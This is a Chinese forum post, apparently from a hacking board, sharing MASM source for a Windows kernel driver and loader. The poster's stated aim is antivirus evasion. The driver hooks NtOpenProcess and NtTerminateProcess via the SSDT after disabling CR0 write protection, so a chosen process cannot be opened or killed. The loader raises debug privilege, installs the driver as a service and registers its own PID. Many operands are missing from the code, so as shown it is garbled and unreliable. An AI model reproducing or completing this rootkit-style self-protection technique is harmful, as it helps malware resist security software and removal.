用汇编自己打造一个最简单的免杀
用汇编自己打造一个最简单的免杀先说一下这两天学习驱动的心得吧,嗯嗯,有点小小的进展,现在已经能够拦截系统的内核函数了,不过要对付杀软恐怕还差得远。不过我想大家都是初学,慢慢来吧。我之所以学习驱动编程,就是奔着免杀来的,哈哈哈,我想大家也是同一个目的吧。好了,废话不多说了:代码如下:
本程序只HOOK了两个系统API
1: NtOpenProcess
2: NtTerminateProcess
并且KeServiceDescriptorTable用的是硬编码,所以大家写的时候要检查自己的头文件中是否有KeServiceDescriptorTable这个声明。
下面是驱动部分:
.586P
.model flat, stdcall
option casemap:none
include SKY1.inc
IOCTL_READ_DATA equ 9002004H
IOCTL_WRITE_DATAequ 9002008H
IOCTL_BEEP_TESTequ 9002000H
MAX_BUF_LENequ 100H
.data
old_open dd ?
off_open dd ?
old_ter dd ?
off_ter dd ?
szdatadb 100h dup(?)
.const
UI "\\Device\\SKY1",szDevice,4
UI "\\??\\SKY1",szSymbol,4
.code
GetSysAddr MACRO FuncName
mov eax,
mov eax,
mov eax,
mov eax,
shl eax,2
mov ecx,KeServiceDescriptorTable
mov ecx,
mov ecx,
add ecx,eax ;
mov eax, ;ECX——>Index EAX——>Offset
ENDM
music proc uses ecx n:DWORD
push eax
mov al,0b6h
out 43h,al
in al,40h
out 42h,al
in al,40h
out 42h,al
mov al,03h
out 61h,al
mov ecx,n
shl ecx,16
@@: nop
loop @b
mov al,0fch
out 61h,al
pop eax
ret
music endp
HookTer:
push 4fh
call music;发出一声惨叫
xor eax,eax
ret 08H
HookOpen: ;我们的HOOK Open 函数头
mov eax,
mov eax, ;取得PID
pushfd
push ecx ;保存ECX
lea ecx,szdata ;取得对照表
cmp eax, ;是要保护的ID吗
jz return ;是,退出
pop ecx
popfd
jmp old_open ;不是,跳到原来的函数继续执行
return: pop ecx
popfd
invoke music,1 ;顺便发出didi~~声
xor eax,eax
ret 10H ;恢复堆栈
SYS_HOOK proc pIdxOf:DWORD, HookADDR:DWORD
cli ;关闭中断,此时决不容许有任何干扰
mov eax,CR0
and eax,not 1000H
mov CR0,eax ;去除WIN32保护
mov eax,HookADDR
mov ecx,pIdxOf
mov ,eax
mov eax,CR0
or eax,1000H
mov CR0,eax ;恢复WIN32保护
sti ;打开中断
ret
SYS_HOOK endp
drUnLoad proc pdr:PDRIVER_OBJECT
;退出时别忘了解除HOOK
invoke SYS_HOOK,off_open,old_open
invoke SYS_HOOK,off_ter, old_ter
invoke IoDeleteSymbolicLink,ADDR szSymbol
mov eax,pdr
invoke IoDeleteDevice,(DRIVER_OBJECT PTR ).DeviceObject
xor eax,eax
ret
drUnLoad endp
ioDispath proc uses esi edi ebx pdev:PDEVICE_OBJECT, pIrp:PIRP
local ilen:ULONG
local olen:ULONG
mov edx,pIrp
Assume edx: PTR _IRP
push edx
IoGetCurrentIrpStackLocation edx
pop edx
mov ebx,eax
Assume ebx: PTR IO_STACK_LOCATION
mov eax,.Parameters.DeviceIoControl.InputBufferLength
mov ilen,eax
mov eax,.Parameters.DeviceIoControl.OutputBufferLength
mov olen,eax
mov ecx,.Parameters.DeviceIoControl.IoControlCode
cmp ecx,IOCTL_READ_DATA
jnz cmp1
push ecx
mov edi,.AssociatedIrp.SystemBuffer
mov esi,offset szdata
mov ecx,ilen
push ecx
rep movsb ;将数据写入用户空间
pop .IoStatus.Information
pop ecx
jmp retu
cmp1:cmp ecx,IOCTL_WRITE_DATA
jnz cmp2
push ecx
mov esi,.AssociatedIrp.SystemBuffer
mov edi,offset szdata
mov ecx,olen
push ecx
rep movsb ;将用户空间的数据读入
pop .IoStatus.Information
pop ecx
jmp retu
cmp2:cmp ecx,IOCTL_BEEP_TEST
jnz cmp3
push 5fh
call music
cmp3:
retu:xor eax,eax
mov .IoStatus.Status,eax
fastcall IoCompleteRequest,pIrp,IO_NO_INCREMENT
xor eax,eax
assume ebx: nothing
assume edx: nothing
ret
ioDispath endp
devCreCls proc pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
mov eax,pIrp
xor ecx,ecx
mov (_IRP PTR ).IoStatus.Status,ecx
mov (_IRP PTR ).IoStatus.Information,ecx
fastcall IofCompleteRequest, pIrp,IO_NO_INCREMENT
xor eax,eax
ret
devCreCls Endp
DriverEntry proc uses esi edi pdr:PDRIVER_OBJECT, pus:PUNICODE_STRING
local pdev:PDEVICE_OBJECT
mov edi,STATUS_DEVICE_CONFIGURATION_ERROR
invoke IoCreateDevice,pdr,MAX_BUF_LEN,ADDR szDevice, 22H,0,0,ADDR pdev
.if eax==STATUS_SUCCESS
invoke IoCreateSymbolicLink,ADDR szSymbol,ADDR szDevice
.if eax==STATUS_SUCCESS
mov esi,pdr
assume esi: PTR DRIVER_OBJECT
mov .DriverUnload,offset drUnLoad
mov ecx,offset devCreCls
mov .MajorFunction,ecx
mov .MajorFunction, ecx
mov .MajorFunction,offset ioDispath
mov eax,.Flags
or eax,DO_BUFFERED_IO
mov .Flags,eax
mov edi,STATUS_SUCCESS
.else
invoke IoDeleteDevice,pdev
.endif
.endif
assume esi: nothing
GetSysAddr ZwOpenProcess
mov old_open,eax
mov off_open,ecx
invoke SYS_HOOK,ecx,offset HookOpen
GetSysAddr ZwTerminateProcess
mov old_ter,eax
mov off_ter,ecx
invoke SYS_HOOK,ecx,offset HookTer
invoke music,2fh ;叫一声表示完成
mov eax,edi
ret
DriverEntry endp
end DriverEntry
下面是用户代码:
.586
.Model FLAT,stdcall
Option CaseMap:None
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include advapi32.inc
includelib advapi32.lib
IOCTL_READ_DATA equ 9002004H
IOCTL_WRITE_DATAequ 9002008H
IOCTL_BEEP_TESTequ 9002000H
.data
szDrv db 'SKY1.sys',0 ;路径名
szDevice db '\\.\SKY1',0 ;设备名
szService db 'SKY1', 0 ;服务名
szClass db '#32770', 0
fmtdb '%d受到保护,ESC键可以退出!',0
DbgName db 'SeDebugPrivilege',0
.data?
buf db 100h dup(?)
ouf db 100h dup(?)
duf db 20h dup(?)
hwnd dd ?
hPid dd ?
hDevicedd ?
hSCManager dd ?
hService dd ?
Tmp dd?
oldProc dd ?
.code
print proc value:dword
pushad
lea esi,duf
invoke wsprintf,esi,offset fmt,value
xor ecx,ecx
invoke MessageBox,ecx,esi,esi,ecx
popad
ret 4
print endp
Getsyspath PROC
invoke GetModuleHandle,0
lea edi,buf
push edi
invoke GetModuleFileName,eax,edi,100h
mov al,0
repnz scasb ;找到NULL
std
mov al,5ch
repnz scasb
cld
inc edi
inc edi
lea esi, szDrv
movsd
movsd
movsb
pop eax
ret
Getsyspath Endp
RemoveSKYDriver PROC
invoke OpenSCManager,0,0,0F003FH
mov hSCManager,eax
invoke OpenService,hSCManager,offset szService,0F01FFH
mov hService,eax
invoke ControlService,hService,1,ADDR Tmp
invoke DeleteService,hService
invoke CloseServiceHandle,hSCManager
invoke CloseServiceHandle,hService
mov eax,hService
ret
RemoveSKYDriver ENDP
InstallSKYDriver PROC lpDriverPath:DWORD
call RemoveSKYDriver
xor edi,edi ;打开管理器
invoke OpenSCManager,edi,edi,0F003FH
MOV hSCManager,eax ;创建服务
lea esi,szService
invoke CreateService,hSCManager,esi,esi,SERVICE_ALL_ACCESS, \
SERVICE_KERNEL_DRIVER,SERVICE_DEMAND_START,SERVICE_ERROR_NORMAL, \
lpDriverPath,edi,edi,edi,edi,edi
mov hService,eax ;Will Run The DriverEntry
invoke StartService,eax, edi,edi
invoke CreateFile,offset szDevice,GENERIC_READ OR GENERIC_WRITE,EDI,EDI,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,EDI
MOV hDevice,eax
push eax
invoke CloseServiceHandle,hService
invoke CloseServiceHandle,hSCManager
pop eax
ret 4
InstallSKYDriver ENDP
SeDbg proc
local hToken:DWORD
local token:TOKEN_PRIVILEGES
xor edi,edi
invoke OpenProcessToken,-1,TOKEN_ALL_ACCESS,addr hToken
invoke LookupPrivilegeValue,edi,OFFSET DbgName,ADDR token.Privileges.Luid
mov token.PrivilegeCount,1
mov token.Privileges.Attributes,SE_PRIVILEGE_ENABLED
invoke AdjustTokenPrivileges,hToken,edi,ADDR token,sizeof token,edi,edi
invoke CloseHandle,hToken
ret
SeDbg endp
BEGIN:CALL SeDbg;提权
call Getsyspath;安装驱动
invoke InstallSKYDriver,eax
inc eax
jz Close
call GetCurrentProcessId
mov hPid,eax
lea edi,hPid ;向SKY1发送自己的PID
invoke DeviceIoControl,hDevice,IOCTL_WRITE_DATA,edi,4,edi,4,ADDR Tmp,0
mov ecx,Tmp
lea esi,ouf
invoke DeviceIoControl,hDevice,IOCTL_READ_DATA,esi,ecx,esi,ecx,ADDR Tmp,0
lodsd
cmp eax,hPid
jnz err0
invoke wsprintf,esi,offset fmt,eax
xor edi,edi
push edi
call GetModuleHandle
invoke CreateWindowEx,edi,offset szClass,esi,0cf0000h,edi,edi,520,200,edi,edi,eax,edi
or eax,eax
jz err0
mov hwnd,eax
invoke ShowWindow,eax,SW_SHOW
sub esp,40h ;开一个结构体
mloop: mov esi,esp
cmp dword ptr,1bh
jz unLoad
push esi
call DispatchMessage
push esi
call TranslateMessage
invoke GetMessage,esi,edi,edi,edi
or eax,eax
jnz mloop
unLoad: add esp,40h
invoke DestroyWindow,hwnd
err0:
invoke CloseHandle,hDevice
Close: call RemoveSKYDriver
push eax
call ExitProcess
END BEGIN 恩学习了啊...
页:
[1]